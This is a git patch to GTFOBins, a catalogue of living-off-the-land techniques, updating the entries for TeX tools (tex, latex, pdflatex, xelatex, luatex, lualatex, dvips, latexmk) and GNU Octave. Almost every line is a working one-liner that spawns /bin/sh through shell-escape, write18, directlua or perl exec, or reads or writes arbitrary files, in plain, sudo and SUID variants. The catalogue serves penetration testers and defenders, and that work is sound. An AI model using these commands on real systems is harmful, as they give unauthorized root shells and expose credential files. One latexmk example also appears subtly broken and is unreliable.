From 21b641911e5666142e06f91078d3736c73e686ca Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Mon, 26 Apr 2021 16:06:18 +0200 Subject: [PATCH] Fix and improve TeX binaries and GNU Octave --- _gtfobins/dvips.md | 18 +++++++++++++----- _gtfobins/latex.md | 24 +++++++++++++++++------- _gtfobins/latexmk.tex | 19 +++++++++++-------- _gtfobins/lualatex.md | 12 ++++++++---- _gtfobins/luatex.md | 13 ++++++++----- _gtfobins/octave.md | 12 ++++++++---- _gtfobins/pdflatex.md | 24 +++++++++++++++++------- _gtfobins/pdftex.md | 12 +++++++++--- _gtfobins/tex.md | 12 +++++++++--- _gtfobins/xelatex.md | 24 +++++++++++++++++------- _gtfobins/xetex.md | 11 +++++++++-- 11 files changed, 126 insertions(+), 55 deletions(-) diff --git a/_gtfobins/dvips.md b/_gtfobins/dvips.md index bae048a..0b21e74 100644 --- a/_gtfobins/dvips.md +++ b/_gtfobins/dvips.md @@ -1,8 +1,16 @@ +--- +description: The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target. functions: + shell: + - code: | + tex '\special{psfile="`/bin/sh 1>&0"}\end' + dvips -R0 texput.dvi sudo: - code: | - echo "\documentclass[12pt]{article} \begin{document}" > file.tex - echo '$$\hbox to5cm{\vbox to5cm{\vfil\special{psfile="`PROGRAM > /tmp/result"}}\hfill}$$' >> file.tex - echo "\end{document}" >> file.tex - tex -interaction=nonstopmode file.tex && sudo dvips -R0 file.dvi - cat /tmp/result + tex '\special{psfile="`/bin/sh 1>&0"}\end' + sudo dvips -R0 texput.dvi + limited-suid: + - code: | + tex '\special{psfile="`/bin/sh 1>&0"}\end' + ./dvips -R0 texput.dvi +--- diff --git a/_gtfobins/latex.md b/_gtfobins/latex.md index 71060ec..17919a0 100644 --- a/_gtfobins/latex.md +++ b/_gtfobins/latex.md @@ -1,11 +1,21 @@ -description: `latex` is a symbolic link to [`pdftex`](/gtfobins/pdftex/). However the program does not have the same behaviour regarding the name of argv[0]. This is the same behaviour for [`xetex`](/gtfobins/xetex/)/[`xelatex`](/gtfobins/xelatex/). +--- functions: + shell: + - code: | + latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' file-read: - - code: | - echo "\documentclass[12pt]{article} \usepackage{verbatim} \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex - latex read.tex - strings read.dvi + - description: The read file will be part of the output. + code: | + latex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' + strings article.dvi sudo: + - description: The read file will be part of the output. + code: | + sudo latex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' + strings article.dvi - code: | - echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex - sudo latex -shell-escape file.tex + sudo latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' + limited-suid: + - code: | + ./latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' +--- diff --git a/_gtfobins/latexmk.tex b/_gtfobins/latexmk.tex index 5e55bc3..bb43d63 100644 --- a/_gtfobins/latexmk.tex +++ b/_gtfobins/latexmk.tex @@ -1,11 +1,14 @@ -description: `latexmk` is a perl script. +description: This allows to execute [`perl`](/gtfobins/perl/) code. functions: + shell: + - code: latexmk -e 'exec "/bin/sh";' + - code: latexmk -latex='/bin/sh #' /dev/null file-read: - - code: | - echo "\documentclass[12pt]{article} \usepackage{verbatim} \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex - latexmk read.tex - strings read.dvi + - code: latexmk -e 'open(X,"/etc/passwd");while(){print $_;}exit' + - description: The read file will be part of the output. + code: | + TF=$(mktemp) + echo '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' >$TF + strings tmp.dvi sudo: - - code: | - echo "PROGRAM > /tmp/result.txt" > /tmp/run.sh - sudo latexmk -latex="/tmp/run.sh" file.tex + - code: sudo latexmk -e 'exec "/bin/sh";' diff --git a/_gtfobins/lualatex.md b/_gtfobins/lualatex.md index 0cd0520..9a85d99 100644 --- a/_gtfobins/lualatex.md +++ b/_gtfobins/lualatex.md @@ -1,6 +1,10 @@ -description: `lualatex` is a symbolic link to [`luatex`](/gtfobins/luatex/). However the program does not have the same behaviour regarding the name of argv[0]. It allows to call external command with \write18 but it also allows to call external [`lua`](/gtfobins/lua/) scripts. +--- +description: This allows to execute [`lua`](/gtfobins/lua/) code. functions: + shell: + - code: lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}' sudo: - - code: | - echo "\documentclass[12pt]{article} \usepackage{shellesc} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex - sudo lualatex -shell-escape file.tex + - code: sudo lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}' + limited-suid: + - code: ./lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}' +--- diff --git a/_gtfobins/luatex.md b/_gtfobins/luatex.md index cbd4778..1014648 100644 --- a/_gtfobins/luatex.md +++ b/_gtfobins/luatex.md @@ -1,7 +1,10 @@ -description: `luatex` allows to call external [`lua`](/gtfobins/lua/) scripts. +--- +description: This allows to execute [`lua`](/gtfobins/lua/) code. functions: + shell: + - code: luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end' sudo: - - code: | - echo '\documentclass{article} \usepackage{luacode} \begin{document} \def\foo{\directlua{dofile("runfunc.lua")}} \foo \end{document}' > file.tex - echo 'os.execute("/usr/bin/id")' > runfunc.lua - luatex --interaction=nonstopmode --shell-escape file.tex + - code: sudo luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end' + limited-suid: + - code: ./luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end' +--- diff --git a/_gtfobins/octave.md b/_gtfobins/octave.md index 9fed372..df881f7 100644 --- a/_gtfobins/octave.md +++ b/_gtfobins/octave.md @@ -1,10 +1,14 @@ +--- description: The payloads are compatible with GUI. functions: shell: - - code: octave-cli --eval "system('/bin/sh')" + - code: octave-cli --eval 'system("/bin/sh")' file-write: - - code: poctave-cli --eval 'filename = "file_to_write"; fid = fopen (filename, "w"); fputs (fid, "DATA"); fclose (fid);' + - code: octave-cli --eval 'filename = "file_to_write"; fid = fopen(filename, "w"); fputs(fid, "DATA"); fclose(fid);' file-read: - - code: octave-cli --eval 'fid = fopen ("/etc/passwd"); while(!feof(fid)); txt = fgetl(fid), txt; endwhile; fclose (fid);' + - code: octave-cli --eval 'format none; fid = fopen("file_to_read"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);' sudo: - - code: sudo octave-cli --eval "system('/bin/sh')" + - code: sudo octave-cli --eval 'system("/bin/sh")' + limited-suid: + - code: ./octave-cli --eval 'system("/bin/sh")' +--- diff --git a/_gtfobins/pdflatex.md b/_gtfobins/pdflatex.md index 9e9431a..2c8530b 100644 --- a/_gtfobins/pdflatex.md +++ b/_gtfobins/pdflatex.md @@ -1,11 +1,21 @@ -description: `pdflatex` is a symbolic link to [`pdftex`](/gtfobins/pdftex/). However the program does not have the same behaviour regarding the name of argv[0]. This is the same behaviour for [`xetex`](/gtfobins/xetex/)/[`xelatex`](/gtfobins/xelatex/). +--- functions: + shell: + - code: | + pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' file-read: - - code: | - echo "\documentclass[12pt]{article} \usepackage{verbatim} \hfuzz=25.002pt \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex - latex read.tex - #/etc/shadow is in read.pdf + - description: The read file will be part of the output. + code: | + pdflatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' + pdftotext article.pdf - sudo: + - description: The read file will be part of the output. + code: | + sudo pdflatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' + pdftotext article.pdf - - code: | - echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex - sudo pdflatex -shell-escape file.tex + sudo pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' + limited-suid: + - code: | + ./pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' +--- diff --git a/_gtfobins/pdftex.md b/_gtfobins/pdftex.md index 5076003..56199a4 100644 --- a/_gtfobins/pdftex.md +++ b/_gtfobins/pdftex.md @@ -1,6 +1,12 @@ -description: `pdftex` has a similar behaviour as [`tex`](/gtfobins/tex/) +--- functions: + shell: + - code: | + pdftex --shell-escape '\write18{/bin/sh}\end' sudo: - code: | - echo "\documentclass[12pt]{article} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex - pdftex -interaction=nonstopmode --shell-escape file.tex + sudo pdftex --shell-escape '\write18{/bin/sh}\end' + limited-suid: + - code: | + ./pdftex --shell-escape '\write18{/bin/sh}\end' +--- diff --git a/_gtfobins/tex.md b/_gtfobins/tex.md index a67ad9b..9b2830d 100644 --- a/_gtfobins/tex.md +++ b/_gtfobins/tex.md @@ -1,6 +1,12 @@ -description: `tex` has a similar behaviour as [`pdftex`](/gtfobins/pdftex/) +--- functions: + shell: + - code: | + tex --shell-escape '\write18{/bin/sh}\end' sudo: - code: | - echo "\documentclass[12pt]{article} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex - tex -interaction=nonstopmode --shell-escape file.tex + sudo tex --shell-escape '\write18{/bin/sh}\end' + limited-suid: + - code: | + ./tex --shell-escape '\write18{/bin/sh}\end' +--- diff --git a/_gtfobins/xelatex.md b/_gtfobins/xelatex.md index 649a51e..7b0713a 100644 --- a/_gtfobins/xelatex.md +++ b/_gtfobins/xelatex.md @@ -1,11 +1,21 @@ -description: `xelatex` is a symbolic link to [`xetex`](/gtfobins/xetex/). However the program does not have the same behaviour regarding the name of argv[0]. +--- functions: + shell: + - code: | + xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' file-read: - - code: | - echo "\documentclass[12pt]{article} \usepackage{verbatim} \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex - latexmk read.tex - #/etc/shadow is in read.pdf + - description: The read file will be part of the output. + code: | + xelatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' + strings article.dvi sudo: + - description: The read file will be part of the output. + code: | + sudo xelatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' + strings article.dvi - code: | - echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex - sudo xelatex -shell-escape file.tex + sudo xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' + limited-suid: + - code: | + ./xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}' +--- diff --git a/_gtfobins/xetex.md b/_gtfobins/xetex.md index 9052329..cfe7926 100644 --- a/_gtfobins/xetex.md +++ b/_gtfobins/xetex.md @@ -1,5 +1,12 @@ +--- functions: + shell: + - code: | + xetex --shell-escape '\write18{/bin/sh}\end' sudo: - code: | - echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex - sudo xetex -interaction=nonstopmode -shell-escape file.tex + sudo xetex --shell-escape '\write18{/bin/sh}\end' + limited-suid: + - code: | + ./xetex --shell-escape '\write18{/bin/sh}\end' +---